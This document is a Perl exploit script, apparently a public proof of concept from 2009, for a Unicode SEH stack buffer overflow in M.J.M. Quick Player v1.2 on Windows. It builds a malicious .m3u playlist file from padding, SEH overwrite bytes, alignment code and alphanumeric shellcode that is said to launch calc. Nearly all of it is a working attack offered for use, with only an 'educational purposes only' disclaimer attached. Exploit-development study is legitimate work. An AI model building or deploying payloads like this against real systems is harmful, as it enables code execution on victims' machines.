# [*] Vulnerability : M.J.M. Quick Player v1.2 Stack BOF
# [*] Discovered by : mr_me (seeleymagic[at]hotmail[dot]com)
# [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit released : dec 28th, 2009
# [*] Type : local and remote code execution
# [*] OS : Windows
# [*] Product : M.J.M. Quick Player
# [*] Versions affected : 1.2 (Latest version is not vulnerable)
# [*] Download from : http://www.brothersoft.com/quick-player-135853.html
# [*] -------------------------------------------------------------------------
# [*] Method : SEH / Unicode
# [*] Tested on : XP SP3 En (VirtualBox)
# [*] Greetz&Tx to : mr_me/EdiStrosar/Rick2600/MarkoT
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
# eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
# Open file in playlist - calc !
#
print "[+] Preparing payload\n";
my $sploitfile="corelanc0d3r_quicksploit.m3u";
my $header="#EXTM3U\n\nHTTP://";
my $junk="A" x 529;
my $field1="\x41\x6d";
my $field2="\x41\x4d"; #boy I love pvefindaddr :-)
my $stuff="\x58\x6d";
$stuff=$stuff."\x05\x02\x01\x6d";
$stuff=$stuff."\x2d\x01\x01\x6d";
$stuff=$stuff."\x50\x6d\xc3";
my $morestuff="D" x 111;
# I think this will execute calc :-)
my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0QU48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA";
my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode;
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $payload;
close(FILE);
print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";